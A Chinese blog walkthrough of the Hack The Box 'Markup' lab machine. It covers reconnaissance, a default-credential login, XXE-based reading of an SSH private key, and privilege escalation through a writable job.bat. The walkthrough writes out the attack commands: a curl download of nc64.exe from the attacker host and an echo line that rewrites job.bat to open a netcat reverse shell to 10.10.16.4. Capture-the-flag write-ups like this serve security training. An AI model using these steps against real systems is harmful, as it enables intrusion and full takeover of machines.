Hack The Box - Markup

已于 2024-08-23 11:46:30 修改
阅读量415 收藏 4
点赞数 3
分类专栏: Hack The Box 文章标签: 网络安全 web安全
于 2024-08-23 11:45:23 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_51845659/article/details/141457686
版权

拿到目标机器

简单探测一下

nmap -sC -A 10.129.151.247

答:2.4.41

一个web服务,22端口有ssh,服务器是Windows系统,后续可能尝试登录一下,先访问网站看看

常规账号口令简单尝试一下,使用admin:password登陆成功。

答:admin:password

Order点单模块有一个用户输入表单

答:order

抓包看一下传输的参数情况

答:1.0

传输的XML文件,这里可能存在XXE攻击,参考文献如下

XXE - XEE - XML External Entity | HackTricks

答:XML External Entity

通过Nmap了解到是windows系统,尝试访问c:/windows/win.ini配置文件验证一下能否利用

成功返回配置信息,可以使用。

结合前面探测到的ssh服务,尝试获取某个用户的ssh登录密钥文件

在web应用的源码上发现了一个用户名daniel

答:daniel

ssh文件默认路径为C:\Users\<用户名>\.ssh\<ssh文件>

.ssh目录包括, id_rsa(私钥)、id_rsa.pub(公钥)、config(配置文件)等

尝试获取一下私钥

将私钥文件保存到本地,命名为id_rsa

用daniel身份ssh远程登录到目标机器

ssh -i id_rsa daniel@10.129.151.247

成功登录

 查看当前用户的特权,没什么特权

whoami /priv

切换到Log-Management路径下查看文件目录

答:job.bat

有一个job.bat脚本,查看一下内容

这个脚本主要用于清除事件日志,需要管理员权限才可以运行脚本

答:wevtutil.exe

查看文件的权限信息

icacls job.bat

BUILTIN\Users用户组包括当前用户daniel,对该文件具有完全控制权(F)

所以决定修改脚本重定向到netcat,执行反弹shell

目标机器不出网,所以要上传一个nc64.exe,可以开一个服务供目标机器下载

nc64.exe源于https://github.com/rahuldottech/netcat-for-windows/releases

攻击机在8000端口开启http服务
python -m http.server 8000

目标机访问后下载nc64.exe
curl http://10.10.16.4:8000/nc64.exe --output nc64.exe

准备就绪后开始反弹shell

攻击机监听1234端口
nc -lvp 1234

目标机器上修改job.bat,执行C:\Log-Management\nc64.exe文件,定向连接到攻击机
echo C:\Log-Management\nc64.exe -e cmd.exe 10.10.16.4 1234 > C:\Log-Management\job.bat

成功获取管理员权限

成功拿下!

TCXY
关注
  • 3
    点赞
  • 4
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
0x08-HackTheBox-Markup
0pr
04-27 459
Recon Nmap nmap 还在跑的时候,我就去这个 ip 看下有没有 web 服务。这是主页。 然后记得上一个 Included 结束的时候,在 login.sql 里有一个登陆信息(移步 这里查看),我试了一下果然登陆成功。 首页。 有个 cookie。 源码没有什么信息。 contact 页面假的,按钮点了没有任何反应。 order 页面,随便填了一些信息,点击提交显示已处理 ...
HackTheBox-Starting Point--Tier 2---Markup
七天
11-17 321
从输出可以看出,组BUTLTIN\Users 对 bat.job 文件具有完全控制权限,BUILTIN\Users 组表示所有本地用户,肯定也就包含 Daniel 用户。我们对该二进制文件job.bat具有完全访问权限,这意味着我们可以修改job.bat文件并插入任何我们构造好的payload。如何wevtutil.exe进程正在运行的话,我门就可以利用job.bat进行计划任务反弹shell了。但是job.bat只能由管理员用户执行,目前是Daniel用户权限,无法利用。1.在网页源代码中,发现存在。
hackthebox-01startpoint-TIER2-Markup
lalalaze的博客
02-08 72
打靶
“干掉”HackTheBox里面的Writeup
知柯信安
12-14 4599
这篇文章描述了在HackTheBox Writeup机器中查找用户和root flags的过程。因此,一如既往地从Nmap扫描开始,以发现正在运行的服务。 # Nmap 7.70 scan initiated Tue Jun 25 12:42:32 2019 as: nmap -p- -O -sV -oN scan.txt 10.10.10.138 Nmap scan report for ip-10-10-10-138.eu-west-2.compute.internal (10.10.10.138) H
THE FORM-WIDGET COOKBOOK
xiaozaq的博客
10-16 407
转载地址:http://www.opensourcestrategies.com/ofbiz/ofbiz_form_widget_cookbook.txt THE FORM-WIDGET COOKBOOK ======================== This document is a series of HOWTOs on using the OFBIZ form-widget to
css hack *html,CSS HACK技巧
weixin_34540951的博客
06-25 164
关于CSS对各个浏览器兼容已经是老生常谈的问题了, 网络上的教程遍地都是.以下内容没有太多新颖, 纯属个人总结, 希望能对初学者有一定的帮助.一、CSS HACKHACK概念:不同的浏览器,比如Internet Explorer 6,Internet Explorer 7,Mozilla Firefox等,对CSS的解析认识不一样,因此会导致生成的页面效果不一样,得不到我们所需要的页面效果。这个时...
CSS HACK(ie6-ie7-fox 兼容)
aegckeir70762的博客
08-14 116
区别IE6与FF: background:orange;*background:blue; 区别IE6与IE7: background:green !important;background:blue; 区别IE7与FF: background:orange; *background:green; 区别FF,IE7,IE6: back...
Internet Explorer and the CSS box model
weixin_34396902的博客
03-03 112
2019独角兽企业重金招聘Python工程师标准>>> ...
tryhackme--OWASP Top 10
qq_45414878的博客
11-13 1552
tryhackme-- OWASP Top 10Task 5 [Severity 1] Command Injection PracticalWhat strange text file is in the website root directory?How many non-root/non-service/non-daemon users are there?What user is this app running as?What is the user's shell set as?What v
hack-and-slash-rpg:一个简单的 HTML、CSS 和 JQuery 应用程序,旨在向用户传授 HTML、CSS 和 JQuery 的基础知识
06-12
例如,使用 `#id` 或 `.class` 选择器,以及 `box-sizing`, `display`, `position`, `margin` 和 `padding` 等属性来调整元素的样式。此外,还会介绍伪类和媒体查询,以实现响应式设计和动态交互效果。 jQuery 是一...
01-html+css做的旧版百度首页
08-27
例如,`margin`和`padding`属性控制元素的间距,`display`属性决定元素如何显示,`box-sizing`处理元素尺寸计算,而`@media`查询可以实现浏览器兼容性调整,确保在IE和其他现代浏览器中样式一致。 描述中提到“兼容...
Google / Baidu 黑客搜索引擎语法详细记录
请大家直接把问题写在评论区或留言,不要只说一句"你好 或 在吗",我会尽快回复的。
09-08 2278
下面就来介绍一些常用的语法: intext: 这个就是把网页中的正文内容中的某个字符做为搜索条件.例如在google里输入:intext:动网.将返回所有在网页正文部分包含”动网”的网页.allintext:使用方法和intext类似. intitle: 和上面那个intext差不多,搜索网页标题中是否有我们所要找的字符.例如搜索:intitle:安全天使.将返回所有网页标题中包含”安全天使”的网页.同理allintitle:也同intitle类似. cache: 搜索
一文解读,网络安全行业人才需求情况《网络安全产业人才发展报告》
weixin_59086772的博客
10-18 8423
随着近几天国家网络安全宣传周在全国各地开展活动,网络安全再一次成为热门话题。网络安全不再缩在小小的安全圈子里,惠及面越来越广。不少对网络安全颇有兴趣的朋友非常关心行业前景如何?该怎么提升自我能力,更快地加入网安行列。 今天雨笋君就10月13日在网络安全宣传周上发布的《2021网络安全人才报告》进行一个简单的行业前景分析。 一、网络安全行业市场发展情况 网络时代生活越来越离不开网络,与此同时发生的网络安全攻击事件、非法入侵等等一系列事件都威胁着普通人的生活。没有网络安全保障,个人和企业等重.
2024年入职/转行网络安全,该如何规划?_网络安全职业规划
2401_85023531的博客
08-23 1240
前段时间,知名机构麦可思研究院发布了《2022年中国本科生就业报告》,其中详细列出近五年的本科绿牌专业,其中,信息安全位列第一。
网络安全(黑客)自学
白帽子凯哥聊黑客
08-22 1458
网络安全可以基于攻击和防御视角来分类,我们经常听到的 “红队”、“渗透测试” 等就是研究攻击技术,而“蓝队”、“安全运营”、“安全运维”则研究防御技术。无论网络、Web、移动、桌面、云等哪个领域,都有攻与防两面性,例如 Web安全技术,既有 Web 渗透,也有 Web 防御技术(WAF)。作为一个合格的网络安全工程师,应该做到攻守兼备,毕竟知己知彼,才能百战百胜。
网络安全威胁2024年中报告
2301_76786857的博客
08-24 226
未知威胁组织(UTG)也对新能源、低轨卫星、人工智能等领域构成威胁。0day 漏洞利用:上半年 0day 漏洞数量达25个,攻击焦点从传统三巨头(微软、谷歌、苹果)转向边界设备,且攻击者在尝试新攻击角度。互联网黑产:不法分子利用网络技术形成黑色产业链,攻击手法多样,目标包括 IT 运维人员、线上考试系统等,目的为获取经济利益。勒索软件:全球勒索软件家族数量众多,新型变种频出,采用“双重勒索”模式,利用漏洞、恶意软件等手段进行攻击。,内容涵盖高级持续性威胁(APT)、勒索软件、互联网黑产、漏洞利用等几方面。
网络安全售前入门01——产品了解
打工人
08-23 650
为方便初入网络安全售前工作的小伙伴了解网安行业情况,我制作一系统售前入门(安全产品,安全服务,法律法规等)介绍,希望能给初进职场小伙伴提供一点帮助。
网络安全系统性学习路线「全文字详细介绍」
最新发布
HUANGXIN9898的博客
08-27 870
🤟 基于入门网络安全打造的:👉黑客&网络安全入门&进阶学习资源包 一、基础与准备 网络安全行业与法规 想要从事网络安全行业,必然要先对行业建立一个整体的认知,了解网络安全对于国家和社会的作用,避免出现“一叶障目,不见森林”的情况。 Linux 操作系统(网安) 很多初学者也常忽略Linux的重要性,认为学习的重头戏在框架等方面,但其实Linux也是重中之重。 计算机网络基础 计算机网络基础是网络/运维工程师都需掌握的知识,但往往会被忽略。但是它是非常重要的。 HTML(
office open xml part4 - markup language reference.pdf
11-30
《Office Open XML Part 4 - Markup Language Reference.pdf》是微软官方发布的关于Office Open XML标记语言的参考手册。该文件详细介绍了Office Open XML标记语言的结构、语法和规范,对于想要深入学习和了解Office Open XML标记语言的开发人员来说是非常重要的参考资料。 这份文档以清晰的语言和丰富的示例讲解了Office Open XML标记语言的各个部分,包括主题、样式、文档结构、元数据等方面的内容。通过本文档可以了解到Office Open XML标记语言的各种标签和属性的含义和用法,以及如何使用这些标记语言来创建和编辑Office文档。 此外,该文档还介绍了Office Open XML标记语言的一些高级特性和扩展功能,如自定义样式、数据绑定、共享工作簿和自定义UI等内容。这些内容对于希望深入利用Office Open XML标记语言进行定制化开发的开发人员来说是非常有益的。 总之,《Office Open XML Part 4 - Markup Language Reference.pdf》是一份非常详实和权威的Office Open XML标记语言的参考手册,对于那些对该标记语言感兴趣的开发人员来说是一份非常有价值的资料。阅读本文档可以帮助开发人员更好地理解和利用Office Open XML标记语言,从而更高效地进行Office文档的开发和定制化工作。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值